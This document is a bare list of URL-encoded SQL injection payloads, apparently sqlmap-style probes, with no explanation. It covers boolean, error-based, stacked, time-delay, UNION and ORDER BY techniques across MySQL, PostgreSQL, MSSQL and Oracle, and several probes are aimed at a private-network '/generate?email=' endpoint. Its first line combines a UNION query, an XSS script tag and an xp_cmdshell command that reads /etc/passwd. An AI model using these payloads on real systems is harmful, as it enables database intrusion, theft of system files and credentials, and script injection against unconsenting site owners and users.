&tLeK=6009%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23
%22%27..%2C%29%29.%29%28
%27hRTCAT%3C%27%22%3Eyfvsuh
%29%20AND%202352%3D5135%20AND%20%286915%3D6915
%20AND%203547%3D5887
%27%29%20AND%206545%3D2456%20AND%20%28%27cYhQ%27%3D%27cYhQ
%27%20AND%204306%3D8504%20AND%20%27ouIQ%27%3D%27ouIQ
%20AND%206735%3D9397--%20YJOx
http://192.168.136.117:50000/generate?email=%28SELECT%20%28CASE%20WHEN%20%289566%3D2943%29%20THEN%20%27test%40test.com%27%20ELSE%20%28SELECT%202943%20UNION%20SELECT%205103%29%20END%29%29
%29%20AND%20%28SELECT%203359%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a7a6b71%2C%28SELECT%20%28ELT%283359%3D3359%2C1%29%29%29%2C0x716a626a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%288198%3D8198
%20AND%20%28SELECT%203359%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a7a6b71%2C%28SELECT%20%28ELT%283359%3D3359%2C1%29%29%29%2C0x716a626a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29
%27%29%20AND%20%28SELECT%203359%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a7a6b71%2C%28SELECT%20%28ELT%283359%3D3359%2C1%29%29%29%2C0x716a626a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%28%27qari%27%3D%27qari
%27%20AND%20%28SELECT%203359%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a7a6b71%2C%28SELECT%20%28ELT%283359%3D3359%2C1%29%29%29%2C0x716a626a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27mQSc%27%3D%27mQSc
%20AND%20%28SELECT%203359%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a7a6b71%2C%28SELECT%20%28ELT%283359%3D3359%2C1%29%29%29%2C0x716a626a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29--%20MGHj
%29%20AND%205095%3DCAST%28%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285095%3D5095%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%288211%3D8211
%20AND%205095%3DCAST%28%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285095%3D5095%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29
%27%29%20AND%205095%3DCAST%28%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285095%3D5095%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%28%27LYpn%27%3D%27LYpn
%27%20AND%205095%3DCAST%28%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285095%3D5095%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27yUaf%27%3D%27yUaf
%20AND%205095%3DCAST%28%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285095%3D5095%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20usMU
%29%20AND%201045%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%281045%3D1045%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%281174%3D1174
%20AND%201045%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%281045%3D1045%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29
%27%29%20AND%201045%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%281045%3D1045%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%28%27QiQG%27%3D%27QiQG
%27%20AND%201045%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%281045%3D1045%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%27dIVy%27%3D%27dIVy
%20AND%201045%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%281045%3D1045%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29--%20tmdq
%29%20AND%208245%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288245%3D8245%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%286972%3D6972
%20AND%208245%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288245%3D8245%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29
%27%29%20AND%208245%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288245%3D8245%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27OXkw%27%3D%27OXkw
%27%20AND%208245%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288245%3D8245%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27ImCh%27%3D%27ImCh
%20AND%208245%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288245%3D8245%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20SPzr
http://192.168.136.117:50000/generate?email=%28SELECT%201869%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a7a6b71%2C%28SELECT%20%28ELT%281869%3D1869%2C1%29%29%29%2C0x716a626a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29
http://192.168.136.117:50000/generate?email=%28SELECT%20CONCAT%28CONCAT%28%27qzzkq%27%2C%28CASE%20WHEN%20%281869%3D1869%29%20THEN%20%271%27%20ELSE%20%270%27%20END%29%29%2C%27qjbjq%27%29%29
%29%3BSELECT%20PG_SLEEP%285%29--
%3BSELECT%20PG_SLEEP%285%29--
%27%29%3BSELECT%20PG_SLEEP%285%29--
%27%3BSELECT%20PG_SLEEP%285%29--
%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--
%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--
%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--
%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--
%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%28119%29%7C%7CCHR%28116%29%7C%7CCHR%28119%29%2C5%29%20FROM%20DUAL--
%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%28119%29%7C%7CCHR%28116%29%7C%7CCHR%28119%29%2C5%29%20FROM%20DUAL--
%27%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%28119%29%7C%7CCHR%28116%29%7C%7CCHR%28119%29%2C5%29%20FROM%20DUAL--
%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%28119%29%7C%7CCHR%28116%29%7C%7CCHR%28119%29%2C5%29%20FROM%20DUAL--
%29%20AND%20%28SELECT%203350%20FROM%20%28SELECT%28SLEEP%285%29%29%29IBbk%29%20AND%20%287418%3D7418
%20AND%20%28SELECT%203350%20FROM%20%28SELECT%28SLEEP%285%29%29%29IBbk%29
%27%29%20AND%20%28SELECT%203350%20FROM%20%28SELECT%28SLEEP%285%29%29%29IBbk%29%20AND%20%28%27CNll%27%3D%27CNll
%27%20AND%20%28SELECT%203350%20FROM%20%28SELECT%28SLEEP%285%29%29%29IBbk%29%20AND%20%27YJov%27%3D%27YJov
%20AND%20%28SELECT%203350%20FROM%20%28SELECT%28SLEEP%285%29%29%29IBbk%29--%20Lqfj
%29%20AND%201147%3D%28SELECT%201147%20FROM%20PG_SLEEP%285%29%29%20AND%20%283406%3D3406
%20AND%201147%3D%28SELECT%201147%20FROM%20PG_SLEEP%285%29%29
%27%29%20AND%201147%3D%28SELECT%201147%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27KPAq%27%3D%27KPAq
%27%20AND%201147%3D%28SELECT%201147%20FROM%20PG_SLEEP%285%29%29%20AND%20%27FIPE%27%3D%27FIPE
%20AND%201147%3D%28SELECT%201147%20FROM%20PG_SLEEP%285%29%29--%20GReK
%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%289108%3D9108
%20WAITFOR%20DELAY%20%270%3A0%3A5%27
%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%28%27eQuP%27%3D%27eQuP
%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27NLVs%27%3D%27NLVs
%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20NlIV
%29%20AND%206895%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2888%29%7C%7CCHR%28120%29%7C%7CCHR%28109%29%7C%7CCHR%2874%29%2C5%29%20AND%20%288243%3D8243
%20AND%206895%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2888%29%7C%7CCHR%28120%29%7C%7CCHR%28109%29%7C%7CCHR%2874%29%2C5%29
%27%29%20AND%206895%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2888%29%7C%7CCHR%28120%29%7C%7CCHR%28109%29%7C%7CCHR%2874%29%2C5%29%20AND%20%28%27uJEB%27%3D%27uJEB
%27%20AND%206895%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2888%29%7C%7CCHR%28120%29%7C%7CCHR%28109%29%7C%7CCHR%2874%29%2C5%29%20AND%20%27BAas%27%3D%27BAas
%20AND%206895%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2888%29%7C%7CCHR%28120%29%7C%7CCHR%28109%29%7C%7CCHR%2874%29%2C5%29--%20pkQT
%29%20ORDER%20BY%201--%20KRqG
%29%20ORDER%20BY%201764--%20TWdv
%20ORDER%20BY%201--%20jjJE
%20ORDER%20BY%205930--%20mWZK
%27%29%20ORDER%20BY%201--%20LKmX
%27%29%20ORDER%20BY%205754--%20xCEj
%27%20ORDER%20BY%201--%20jvcX
%27%20ORDER%20BY%202573--%20faSc
%20ORDER%20BY%201--%20zvMZ
%20ORDER%20BY%203206--%20vexY